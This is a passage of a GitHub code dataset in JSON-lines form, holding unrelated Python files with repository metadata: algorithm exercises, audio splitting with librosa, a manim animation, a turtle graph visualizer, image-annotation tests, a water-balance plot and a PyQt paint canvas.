100, tails / (heads + tails) * 100]\n\n class Analytics(Calculations):\n def __init__(self, data, logger):\n super().__init__(data, logger)\n\n def predict_random(self, n):\n self.logger.debug('Predict the random of heads and tails')\n res = []\n for i in range(n):\n tmp = randint(0, 1)\n res.append([tmp, (tmp + 1) % 2])\n return res\n\n def predict_last(self):\n self.logger.debug('Predict the last of heads and tails')\n return self.data[-1]\n\n def save_file(self, data, file_name, extension='txt'):\n self.logger.debug('Save data to ' + file_name + '.' + extension)\n with open(file_name + '.' + extension, 'w') as outfile:\n outfile.write(data)\n","repo_name":"danlee65071/piscine_python_ds","sub_path":"day02/ex06/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32336601672","text":"def dfs(start):\r\n visited[start] = True\r\n result.append(start)\r\n for i in range(1, n + 1):\r\n if not visited[i] and arr[start][i]:\r\n dfs(i)\r\n return result\r\n\r\n\r\nn = int(input())\r\nm = int(input())\r\narr = [[0] * (n + 1) for _ in range(n + 1)]\r\nvisited = [False] * (n + 1)\r\nresult = []\r\nfor _ in range(m):\r\n u, v = map(int, input().split())\r\n arr[u][v] = 1\r\n arr[v][u] = 1\r\n\r\nprint(len(dfs(1)) - 1)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Silver/2606.py","file_name":"2606.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070911527","text":"# Given the root of a binary tree, where each node holds a digit between 0 and 9.\n#\n# Each root-to-leaf path represents a number:\n#\n# For example, the root-to-leaf path 1 -> 2 -> 3 represents the number 123.\n#\n# Compute the sum of all numbers generated from root-to-leaf paths.\n#\n# A leaf node is a node that has no children.\n#\n# Example 1:\n#\n# Input: root = [1,2,3]\n# Output: 25\n# Explanation:\n# The root-to-leaf path 1->2 represents the number 12\n# The root-to-leaf path 1->3 represents the number 13\n# Therefore, the sum of numbers = 12 + 13 = 25\n#\n# Example 2:\n#\n# Input: root = [4,9,0,5,1]\n# Output: 1026\n# Explanation:\n# The root-to-leaf path 4->9->5 represents the number 495\n# The root-to-leaf path 4->9->1 represents the number 491\n# The root-to-leaf path 4->0 represents the number 40\n# Therefore, the sum of numbers = 495 + 491 + 40 = 1026\n#\n# Constraints:\n#\n# The number of nodes in the tree is in the range [1, 1000]\n# 0 <= Node.val <= 9\n# The depth of the tree does not exceed 10\n#\n# Note: this problem is the same as problem 129 on the main site: https://leetcode-cn.com/problems/sum-root-to-leaf-numbers/\n# Related Topics Tree Depth-First Search Binary Tree 👍 16 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n # def sumNumbers(self, root: TreeNode) -> int:\n # \"\"\"\n # Method 1: depth-first search + divide and conquer\n # :param root:\n # :return:\n # \"\"\"\n # path = 0\n # if not root:\n # return path\n # return self.dfs(root, path)\n #\n # def dfs(self, node: TreeNode, path: int) -> int:\n # # reached the child of a leaf node, return directly\n # if not node:\n # return 0\n # # the node exists, add the current node's value\n # path = path * 10 + node.val\n # # the node is a leaf, return the accumulated value\n # if not node.left and not node.right:\n # return path\n # # divide and conquer: add the results of the left and right subtrees\n # return self.dfs(node.left, path) + self.dfs(node.right, path)\n\n # def sumNumbers(self, root: TreeNode) -> int:\n # path = 0\n #\n # def dfs(node, path):\n # if not node:\n # return 0\n # path = path * 10 + node.val\n # if not node.left and not node.right:\n # return path\n # return dfs(node.left, path) + dfs(node.right, path)\n # return dfs(root, path)\n\n def sumNumbers(self, root: TreeNode) -> int:\n \"\"\"\n 
Method 2: breadth-first search (level-order traversal)\n :param root:\n :return:\n \"\"\"\n from collections import deque\n # two queues: one stores the visited nodes, the other stores the running sums\n node_q = deque([root])\n sum_q = deque([root.val])\n\n res = 0\n while node_q:\n node = node_q.popleft()\n num = sum_q.popleft()\n left, right = node.left, node.right\n if not left and not right:\n # reached a leaf node\n res += num\n else:\n if left:\n node_q.append(left)\n sum_q.append(num * 10 + left.val)\n if node.right:\n node_q.append(right)\n sum_q.append(num * 10 + right.val)\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 049]从根节点到叶节点的路径数字之和.py","file_name":"[剑指 Offer II 049]从根节点到叶节点的路径数字之和.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10183894786","text":"import settings\nimport numpy as np\nimport librosa as lr\nfrom utils import stopwatch\n\n\n@stopwatch\ndef on_silence(y,\n merge=False,\n hop_length=settings.HOP_LENGTH,\n frame_length=settings.FRAME_LENGTH):\n \"\"\" Split signal into non-silent intervals.\n\n :param y: samples (signal)\n :param merge: merge splits into one signal\n\n :returns: signal (or segments), splits\n \"\"\"\n splits = lr.effects.split(y,\n hop_length=hop_length,\n frame_length=frame_length)\n\n # merge signal using provided indices\n if merge:\n return lr.effects.remix(y, intervals=splits)\n\n # return audio chunks based on indices\n return np.asarray([y[s:e] for s, e in splits]), splits\n\n\n@stopwatch\ndef on_onsets(y,\n sr=settings.SAMPLE_RATE,\n backtrack=True,\n hop_length=settings.HOP_LENGTH):\n \"\"\" Split signal based on detected onsets.\n Optionally try to locate nearest silent spot.\n\n :param y: samples (signal)\n :param sr: sample rate\n :param backtrack: locate silent spots\n\n :returns: array, onsets\n \"\"\"\n # extract backtracked onsets\n onsets = lr.onset.onset_detect(y=y,\n sr=sr,\n units='samples',\n backtrack=backtrack,\n hop_length=hop_length)\n\n # prepend first sample index\n onsets = np.insert(onsets, 0, 0)\n\n # append last sample index\n onsets = np.append(onsets, y.shape[0])\n\n # chunk to individual segments\n splits = [y[onsets[i]:onsets[i + 1]] for i, _ in enumerate(onsets[:-1])]\n return splits, onsets\n","repo_name":"nthe/milacc","sub_path":"src/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21693143173","text":"import manim as mn\nfrom potential import *\nimport matplotlib.pyplot as plt \nimport numpy as np\n\n\nmn.config.media_width = \"75%\"\nmn.config.verbosity = \"WARNING\"\n\n\n\nclass gatepot(mn.ThreeDScene):\n def construct(self):\n g = alternating_spacing(2, 90e-9, 50e-9, 90e-9, gap=10e-9, dot_voltage=-0.001, gate_voltage=0.001, drain_voltage=-1e-4)\n \n # self.set_camera_orientation(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n self.set_camera_orientation(phi=0, theta=-mn.PI/2, zoom=1)\n \n ax = mn.ThreeDAxes(\n x_range=(-400e-9, 400e-9, 100e-9), \n y_range=(-200e-9, 200e-9, 100e-9), \n z_range=(-5e-4, 5e-4, 1e-4),\n axis_config={'include_ticks': True},\n tips=False)\n \n \n self.play(mn.Create(ax))\n self.wait(1)\n\n rects = []\n for name in g.gate_names:\n if name != 'S' and name != 'D':\n # create the rectangle scaled to fit the plot\n rects.append(mn.Rectangle(\n width=ax.coords_to_point(g[name].width)[0],\n 
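on_silence and on_onsets in split.py above both reduce to librosa producing sample indices that are then used to slice the waveform. A short hedged usage sketch with a synthetic signal (literal values stand in for the repo's settings constants):

import numpy as np
import librosa

sr = 22050
# one second of silence, a 440 Hz tone, then silence again
tone = 0.5 * np.sin(2 * np.pi * 440 * np.arange(sr) / sr)
y = np.concatenate([np.zeros(sr), tone, np.zeros(sr)]).astype(np.float32)

intervals = librosa.effects.split(y, top_db=30, frame_length=2048, hop_length=512)
print(intervals)  # roughly [[22050, 44100]] -- the non-silent span

segments = [y[s:e] for s, e in intervals]  # slice as the module above does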
height=ax.coords_to_point(g[name].height)[0],\n fill_opacity=0.1,\n color=mn.RED).move_to(ax.coords_to_point(*g[name].pos)))\n \n # add the name of the gate\n t = mn.Text(name).scale(0.5)\n t.move_to(rects[-1].get_top())\n t.shift(0.9 * t.height * mn.DOWN)\n rects.append(t)\n # add a rectangle for the source and the drain\n rects.append(mn.Rectangle(width=10, height=10, fill_opacity=0.1, color=mn.RED).move_to((ax.coords_to_point(g['S'].R)[0] - 5) * mn.RIGHT))\n rects.append(mn.Rectangle(width=10, height=10, fill_opacity=0.1, color=mn.RED).move_to((ax.coords_to_point(g['D'].L)[0] + 5) * mn.RIGHT))\n # add source and drain names\n rects.append(mn.Text('Source').rotate(mn.PI/2).move_to(6*mn.LEFT))\n rects.append(mn.Text('Drain').rotate(-mn.PI/2).move_to(6*mn.RIGHT))\n rects = mn.VGroup(*rects)\n\n self.play(mn.Create(rects))\n self.wait(2)\n\n surf = ax.plot_surface(\n function=g,\n u_range=(-300e-9, 300e-9),\n v_range=(-200e-9, 200e-9),\n fill_opacity=0.3)\n \n self.play(mn.Create(surf))\n self.wait(2)\n\n self.move_camera(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n self.wait(2)\n\n self.play(mn.FadeOut(rects), run_time=1)\n self.wait(1)\n\n # wiggle gate voltages\n for name, v in [('X1', 0.002), ('P1', -0.002), ('X0', 0.0015), ('P0', -0.0015), ('P1', -0.001), ('X2', 0.0015), ('S', 0.0003), ('D', -3e-4)]:\n g[name].set_voltage(v)\n surf.target = ax.plot_surface(\n function=g,\n u_range=(-300e-9, 300e-9),\n v_range=(-200e-9, 200e-9),\n fill_opacity=0.3)\n \n self.play(mn.MoveToTarget(surf), run_time=2)\n self.wait(1.5)\n\n\n\nclass testing(mn.ThreeDScene):\n def construct(self):\n # self.set_camera_orientation(phi=60 * mn.DEGREES, theta=-60 * mn.DEGREES, zoom=0.9)\n\n # ax = mn.ThreeDAxes((-400e-9, 400e-9, 100e-9), (-200e-9, 200e-9, 100e-9), (-2e-4, 8e-4, 1e-4), axis_config={'include_tip': True})\n \n # # self.play(mn.Create(rects))\n # self.play(mn.Create(ax))\n # self.wait(1)\n \n self.set_camera_orientation(phi=2*mn.PI/5, theta=mn.PI/5)\n # axes = mn.ThreeDAxes(\n # x_range=(-6e-9, 6e-9, 1e-9),\n # y_range=(-6e-9, 6e-9, 1e-9))\n axes = mn.ThreeDAxes(\n x_range=(-400e-9, 400e-9, 100e-9), \n y_range=(-200e-9, 200e-9, 100e-9), \n z_range=(-5e-4, 5e-4, 1e-4),\n axis_config={'include_ticks': True},\n tips=False)\n # axes = mn.NumberLine(\n # x_range=(0, 400e-9, 20e-9),\n # include_tip=True,\n # length=8\n # )\n # axis_config={\"include_numbers\": True})\n # labels = axes.get_axis_labels(\n # mn.Tex(\"x-axis\").scale(0.7), mn.Text(\"y-axis\").scale(0.45), mn.Text(\"z-axis\").scale(0.45)\n # )\n self.play(mn.Create(axes))\n # self.wait(1)\n # self.play(mn.Create(labels))\n self.wait(2)","repo_name":"trishanamruthur/HRL-Labs-Clinic","sub_path":"Tunneling-Demo/anim.py","file_name":"anim.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37146544840","text":"\"\"\"\nFile: main.py\nAuthor: Delano Lourenco\nRepo: https://github.com/3ddelano/graph-visualizer-python\nLicense: MIT\n\"\"\"\n\nimport turtle\nfrom graph_gui.graphgui import GraphGUI, VERSION\nfrom graph_gui.constants import SCREEN_BG_COLOR\nimport traceback\n\n\ndef one_step():\n try:\n canvas.delete(\"all\")\n tur.clear()\n graphgui.draw(tur, canvas)\n screen.update()\n screen.ontimer(one_step, 50)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print(\"Exiting program\")\n quit()\n\n\ndef onmove(self, fun, add=None):\n if fun is None:\n self.cv.unbind(\"<Motion>\")\n else:\n\n def eventfun(event):\n fun(\n self.cv.canvasx(event.x) / self.xscale,\n -self.cv.canvasy(event.y) / self.yscale,\n )\n\n self.cv.bind(\"<Motion>\", eventfun, add)\n\n\n# Setup the screen\nscreen = turtle.Screen()\nscreen.tracer(False)\nscreen.setup(1280, 720)\nscreen.setworldcoordinates(0, 720, 1280, 0)\nscreen.bgcolor(SCREEN_BG_COLOR)\ncanvas = screen.getcanvas()\n\n# The graph\ngraphgui = GraphGUI(canvas)\n\nscreen.title(f\"Graph Visualizer {VERSION} - 3ddelano\")\n\n# turtle.tracer(False)\nturtle.tracer(False)\ntur = turtle.Turtle()\ntur.speed(0)\ntur.hideturtle()\n\n# Events\nscreen.listen()\nturtle.onscreenclick(graphgui.on_left_click, 1)\nturtle.onscreenclick(graphgui.on_right_click, 3)\nonmove(screen, graphgui.ondrag, 1)\nscreen.onkey(graphgui.on_save, \"s\")\nscreen.onkey(graphgui.on_load, \"l\")\nscreen.onkey(graphgui.on_delete, \"d\")\nscreen.onkey(graphgui.on_bfs_start, \"b\")\nscreen.onkey(graphgui.on_dfs_start, \"n\")\nscreen.onkey(graphgui.on_help_toggle, \"h\")\nscreen.onkey(graphgui.on_nodeid_toggle, \"f\")\nscreen.onkey(graphgui.on_update_weight, \"w\")\nexited = False\n\n# Main loop\nprint(\"Graph Visualizer starting...\")\none_step()\nscreen.mainloop()\n","repo_name":"3ddelano/graph-visualizer-python","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21963730224","text":"from shapely.geometry import box\n\nfrom pims.processing.annotations import ParsedAnnotation, ParsedAnnotations, get_annotation_region\nfrom pims.processing.region import Region\nfrom pims.utils.color import Color\n\n\ndef test_annotation():\n geom = box(10, 20, 30, 40)\n annot = ParsedAnnotation(geom)\n assert annot.is_fill_grayscale is True\n assert annot.is_stroke_grayscale is True\n assert annot.bounds == (10, 20, 30, 40)\n\n grey = Color(\"grey\")\n red = Color(\"red\")\n annot = ParsedAnnotation(geom, fill_color=red, stroke_color=grey)\n assert annot.is_fill_grayscale is False\n assert annot.is_stroke_grayscale is True\n assert annot.is_grayscale is False\n\n annot = ParsedAnnotation(geom, fill_color=grey, stroke_color=grey)\n assert annot.is_grayscale is True\n\n\ndef test_annotation_list():\n grey = Color(\"grey\")\n white = Color(\"white\")\n red = Color(\"red\")\n\n annot1 = ParsedAnnotation(box(10, 20, 30, 40), fill_color=white, stroke_color=red)\n annot2 = ParsedAnnotation(box(5, 100, 20, 200), fill_color=grey, stroke_color=white)\n\n al = ParsedAnnotations()\n al.append(annot1)\n al.append(annot2)\n\n assert len(al) == 2\n assert al[1] == annot2\n assert al.is_fill_grayscale is True\n assert al.is_stroke_grayscale is False\n assert al.is_grayscale is False\n assert al.bounds == (5, 20, 30, 200)\n\n\ndef test_annotation_region():\n class FakeImage:\n def __init__(self, w, h):\n self.width = w\n self.height = h\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(10, 20, 30, 40)))\n assert get_annotation_region(\n FakeImage(100, 100), al\n ) == Region(20, 10, 20, 20)\n assert get_annotation_region(\n FakeImage(100, 100), al, context_factor=1.5\n ) == Region(15, 5, 30, 30)\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(10, 20, 30, 30)))\n assert get_annotation_region(\n FakeImage(100, 100), al, try_square=True\n ) == Region(15, 10, 20, 20)\n\n al = ParsedAnnotations()\n al.append(ParsedAnnotation(box(20, 10, 30, 30)))\n assert get_annotation_region(\n FakeImage(100, 100), al, try_square=True\n ) == Region(10, 15, 20, 
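onmove above reaches into turtle's underlying Tk canvas because the turtle module exposes click and key bindings but no public mouse-motion hook, and it rescales canvas pixels back into world coordinates. A stripped-down, self-contained version of the same trick (names are illustrative):

import turtle

def bind_motion(screen, fun):
    # turtle.Screen has no onmove(); bind <Motion> on the raw Tk canvas instead.
    def handler(event):
        fun(screen.cv.canvasx(event.x) / screen.xscale,
            -screen.cv.canvasy(event.y) / screen.yscale)
    screen.cv.bind("<Motion>", handler)

# Usage sketch (needs a display):
# screen = turtle.Screen()
# bind_motion(screen, lambda x, y: print("pointer at", x, y))
# screen.mainloop()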
20)\n","repo_name":"Cytomine-ULiege/pims","sub_path":"tests/test_processing_annotations.py","file_name":"test_processing_annotations.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775561100","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom matplotlib import ticker\nimport datetime as dt\nimport netCDF4 as nc\n\n\nfdfl = \"EucFACE_amb_default-met_only_or-off.csv\"\nfctl = \"EucFACE_amb_ctl_met_LAI_vrt_SM_swilt-watr_31uni_HDM_or-off-litter_Hvrd.csv\"\n\ndfl = pd.read_csv(fdfl, usecols = ['Year','Season','Rainf','Evap','TVeg','ESoil','ECanop','Qs','Qsb','Qrecharge','soil_storage_chg'])\nctl = pd.read_csv(fctl, usecols = ['Year','Season','Rainf','Evap','TVeg','ESoil','ECanop','Qs','Qsb','Qrecharge','soil_storage_chg'])\n\ndfl['Qs'] = dfl['Qs']+dfl['Qsb']\nctl['Qs'] = ctl['Qs']+ctl['Qsb']\n\ndfl = dfl.drop(['Year','Season','Qsb'], axis=1)\nctl = ctl.drop(['Year','Season','Qsb'], axis=1)\n\ndfl = dfl.drop([0])\nctl = ctl.drop([0])\n\nprint(dfl)\nprint(ctl)\n\nobs = [[155,153,99,34,20,0,0,-113],\\\n [84,84,61,19,3,0,0,-45],\\\n [250,120,75,24,21,0,0,114],\\\n [151,159,106,36,16,0,0,-149],\\\n [170,132,76,27,30,0,0,-26],\\\n [150,80,50,13,18,0,0,25]]\n # Autum-2013\n # Winter-2013\n # Spring-2013\n # Summer-2014\n # Autum-2014\n # Winter-2014\nprint(np.sum(dfl.iloc[0:4].values,axis=0))\nprint(np.sum(obs[1:5],axis=0))\n\ntitle = 'Water Balance'\n\n# _____________ Make plot _____________\nfig = plt.figure(figsize=(8,6))\nfig.subplots_adjust(hspace=0.3)\nfig.subplots_adjust(wspace=0.2)\nplt.rcParams['text.usetex'] = False\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.rcParams['font.sans-serif'] = \"Helvetica\"\nplt.rcParams['axes.labelsize'] = 12\nplt.rcParams['font.size'] = 12\nplt.rcParams['legend.fontsize'] = 12\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nax = fig.add_subplot(111)\n\nlabels = ['Rain','Evap','TVeg','ESoil','ECanop','Runoff','Rechrg','ΔS']\nx = np.arange(len(labels)) # the label locations\nwidth = 0.6 # the width of the bars\n\nrects1 = ax.bar(x - 0.2, np.sum(obs[0:4],axis=0), width/3, color='blue', label='obs')\nrects2 = ax.bar(x , np.sum(dfl.iloc[1:5].values,axis=0), width/3, color='orange', label='def')\nrects3 = ax.bar(x + 0.2, np.sum(ctl.iloc[1:5].values,axis=0), width/3, color='green', label='imp')\n\n# Add some text for labels, title and custom x-axis tick labels, etc.\nax.set_ylabel('$mm y^{-1}$')\nax.set_title(title)\nax.set_xticks(x)\nax.set_xticklabels(labels)\nax.legend()\n\n#fig.tight_layout()\n\nplt.show()\n\nfig.savefig('water_balance_2013_obs-def-ctl', bbox_inches='tight',pad_inches=0.1)\n","repo_name":"bibivking/EucFACE_run","sub_path":"plots/plot_eucface_waterbal_bar_year.py","file_name":"plot_eucface_waterbal_bar_year.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27967361106","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/17271\n# from itertools import permutations,product\n# n,m = wow()\n# n_list = [1,m]\n# for i in range(2,n+1):\n# temp_list = []\n# for k in range(1,i+1):\n# new_list = list(product(n_list,repeat=k))\n# new_list = [index for 
index in new_list if sum(index) == i]\n# temp_list.extend(new_list)\n# print(i,len(temp_list))\n\n# n,m = wow()\n# n_list = [0]*(n+1)\n# # print(n_list)\n# for i in range(1,min(m+1,n+1)):\n# # print(\"Start\",i)\n# if i != m:\n# n_list[i]=1\n# else:\n# n_list[i]=2\n# for k in range(m+1,n+1):\n# n_list[k]=n_list[k-1]+n_list[k-m]\n# n_list[k]%=1000000007\n# print(n_list[-1])\n\n# n,k = map(int,(input().split()))\n# total = [0]*(n+1)\n# for i in range(1,min(k+1,n+1)):\n# if i != k:\n# total[i]=1\n# else:\n# total[i]=2\n\n# for i in range(k+1,n+1):\n# if i >k:\n# total[i]=total[i-1]+total[i-k]\n \n# total[i]%=1000000007\n\n \n \n# print(total[-1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/5월/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70021009768","text":"\nclass LogicPreps:\n\n def __init__(self):\n self.ext_fa = \".fa\"\n self.ext_dat = \".dat\"\n self.ext_gtf = \".gtf\"\n self.strt_NM_ = \"NM_\"\n\n def sort_list_by_ele(self, data_list, ele_idx, up_down_flag=True):\n result_list = []\n for tmp_arr in sorted(data_list, key=lambda tmp_arr: tmp_arr[ele_idx], reverse=up_down_flag):\n result_list.append(tmp_arr)\n return result_list\n\n def make_list_to_dict_by_ele_as_key(self, dfam_list, ele_key):\n result_dict = {}\n for dfam_arr in dfam_list:\n tmp_key = dfam_arr[ele_key]\n if tmp_key in result_dict:\n result_dict[tmp_key].append(dfam_arr)\n else:\n result_dict.update({tmp_key: [dfam_arr]})\n return result_dict\n\n def merge_multi_list(self, pool_list):\n result_list = []\n for split_list in pool_list:\n result_list.extend(split_list)\n return result_list\n","repo_name":"astroboi-SH-KWON/TE_targeting_DNA_clock","sub_path":"LogicPrep.py","file_name":"LogicPrep.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33368913322","text":"import sys\nimport random\nfrom pathlib import Path\nfrom functools import partial\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass PaintingApplication(QtWidgets.QWidget):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.brushSize = 1 # The initial brush size\n self.spray_size = 100 # The area occupied by one spray\n self.lastPoint = QtCore.QPoint() # The coordinates of where the last event occurred\n self.statusBar_event = QtCore.pyqtSignal()\n self.titleBar_event = QtCore.pyqtSignal()\n\n # Image canvas\n self.filePath = ''\n self.drawing = False\n self.saved = False\n self.image = QtGui.QImage(self.size(), QtGui.QImage.Format_RGB32)\n self.image.fill(QtCore.Qt.white)\n\n # Default brush values\n self.brushColor = QtCore.Qt.black\n self.penStyle = QtCore.Qt.SolidLine\n self.capStyle = QtCore.Qt.RoundCap\n self.joinStyle = QtCore.Qt.RoundJoin\n\n # Initial events handler\n self.mouseMoveEvent = self.pen_mouseMoveEvent\n\n # A custom method based on the save method\n self.saveAs = partial(self.save, save_as=True)\n\n def set_event_outlet(self, status_bar, title_bar):\n \"\"\" This sets where the signals are been sent to \"\"\"\n self.statusBar_event = status_bar\n self.titleBar_event = title_bar\n\n def mousePressEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton:\n self.drawing = True\n self.lastPoint = event.pos()\n\n def mouseReleaseEvent(self, event):\n if event.button == QtCore.Qt.LeftButton:\n self.drawing = 
False\n\n    def paintEvent(self, event):\n        canvas_painter = QtGui.QPainter(self)\n        canvas_painter.drawImage(self.rect(), self.image, self.image.rect())\n\n    def resizeEvent(self, event: QtGui.QResizeEvent):\n        \"\"\" When the window size has changed you scale the image \"\"\"\n        self.image = self.image.scaled(self.width(), self.height())\n\n    def save(self, save_as=False):\n        if save_as:\n            self.saved = False\n        if not self.saved:\n            file_path, _ = QtWidgets.QFileDialog.getSaveFileName(\n                self, \"Save Image\", \"\",\n                \"PNG(*.png);;JPG(*.jpg *.jpeg);;All Files (*.*)\")\n            # If the user exited the dialog\n            if file_path == \"\":\n                self.statusBar_event.emit('No file path provided')\n                # Here it will just return to the app\n                return\n            self.saved = True\n            self.filePath = file_path\n        else:\n            file_path = self.filePath\n        self.image.save(file_path)\n\n        # Get just the name of the file\n        path = Path(file_path)\n        file_path, _ = path.name.split('.')\n\n        # Update both the status and title bar\n        self.statusBar_event.emit('File Saved')\n        self.titleBar_event.emit(f'{file_path} project')\n\n    def clear(self):\n        \"\"\" Fill the canvas with white color \"\"\"\n        self.image.fill(QtCore.Qt.white)\n        self.update()\n\n    def open(self):\n        file_path, _ = QtWidgets.QFileDialog.getOpenFileName(\n            self, \"Open Image\", \"\",\n            \"PNG(*.png);;JPG(*.jpg *.jpeg);;All Files (*.*)\")\n        # If the user exited the dialog\n        if file_path == \"\":\n            return\n        with open(file_path, 'rb') as f:\n            content = f.read()\n        # Load the image data from the BytesIO buffer\n        self.image.loadFromData(content)\n        width = self.width()\n        height = self.height()\n        self.image = self.image.scaled(width, height)\n        self.update()\n\n    # All the brushes Handlers\n    def pen_mouseMoveEvent(self, event):\n        \"\"\" Check if the button clicked was the left one \"\"\"\n        if event.buttons() & QtCore.Qt.LeftButton & self.drawing:\n            painter = QtGui.QPainter(self.image)\n            painter.setPen(QtGui.QPen(self.brushColor, self.brushSize,\n                           self.penStyle, self.capStyle, self.joinStyle))\n            painter.drawLine(self.lastPoint, event.pos())\n            self.lastPoint = event.pos()\n            self.update()\n\n    def spray_mouseMoveEvent(self, e):\n        \"\"\" This puts dots at random point within the specified radius \"\"\"\n        painter = QtGui.QPainter(self.image)\n        p = painter.pen()\n        p.setWidth(1)\n        p.setColor(self.brushColor)\n        painter.setPen(p)\n        for _ in range(self.spray_size):\n            xo = random.gauss(0, self.brushSize)\n            yo = random.gauss(0, self.brushSize)\n            painter.drawPoint(e.x() + xo, e.y() + yo)\n        self.update()\n\n    def eraser_mouseMoveEvent(self, e):\n        \"\"\" This is pen brush using the square cap \"\"\"\n        painter = QtGui.QPainter(self.image)\n        p = painter.pen()\n        p.setWidth(self.brushSize)\n        p.setColor(QtCore.Qt.white)\n        painter.setPen(p)\n        p.setCapStyle(QtCore.Qt.SquareCap)\n        painter.drawPoint(e.x(), e.y())\n        self.update()\n\n\n# This is available for debugging\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    window = PaintingApplication()\n    window.show()\n    app.exec()\n","repo_name":"yungwarlock/PaintApp","sub_path":"widgets/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71229919848","text":"import json\n\n\nclass Person:\n    def __init__(self, price, name):\n        self.price = price\n        self.name = name\n\n    # set of rules, a data serialization format - json(JavaScript Object Notation)\n# person =Person(\"ionescu\", 2000) - > serialized -> String(json format) ->
 transmitted over the internet, files, external drives -> objects (deserialization)\n\nthisdict = [\n    { \"brand\": \"Ford\",\n    \"model\": \"Mustang\",\n    \"year\": 1964},\n\n    {\"brand\": \"Ford\",\n    \"model\": \"Mustang\",\n    \"year\": 1964}\n]\n\nprint(thisdict)\n\n# convert into JSON:\ny = json.dumps(thisdict)\nprint(\"Serialization:{}\".format(y))\n\n# write data to a file, after serialization\nf = open(\"demofile2.txt\", \"a\")\nf.write(y)\nf.close()\n\n# parse x:\nx = json.loads(y)\nprint(\"Deserialization:{}\".format(x))","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Siruri de caractere/Reprezentarea binara.py","file_name":"Reprezentarea binara.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72056782569","text":"from triangle import *\nfrom vertex import *\n\n\nclass Reader:\n    def __init__(self, file):\n        file = open(file, \"r\")\n\n        nb_of_vertices = int(file.readline())\n        self.vertices = []\n\n        for i in range(0, nb_of_vertices):\n            vertex = Vertex(list(map(float, file.readline().split())))\n            self.vertices.append(vertex)\n\n        Triangle.index = len(self.vertices) + 3\n\n        nb_of_triangles = int(file.readline())\n        self.triangles = []\n\n        for j in range(0, nb_of_triangles):\n            indices = list(map(int, file.readline().split()))\n            self.triangles.append(\n                Triangle(self.vertices[indices[0]], self.vertices[indices[1]], self.vertices[indices[2]]))\n\n    def __str__(self):\n        string = \"Vertices (\" + str(len(self.vertices)) + \")\\n\"\n        for vertex in self.vertices:\n            string += str(vertex) + \"\\n\"\n\n        string += \"\\nTriangles (\" + str(len(self.triangles)) + \")\\n\"\n        for triangle in self.triangles:\n            string += str(triangle) + \"\\n\"\n        return string\n\n    def serialize(self):\n        string = \"Vertices\\n\"\n        for vertex in self.vertices:\n            string += vertex.serialize_w_index() + \"\\n\"\n        string += \"\\nTriangles\\n\"\n        for triangle in self.triangles:\n            string += triangle.serialize() + \"\\n\"\n        return string\n","repo_name":"cpeelman/3dcg","sub_path":"mesh/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73143675368","text":"# Copyright (c) Meta Platforms, Inc. and affiliates.\r\n# All rights reserved.\r\n#\r\n# This source code is licensed under the license found in the\r\n# LICENSE file in the root directory of this source tree.\r\n\r\n\"\"\"EnCodec model 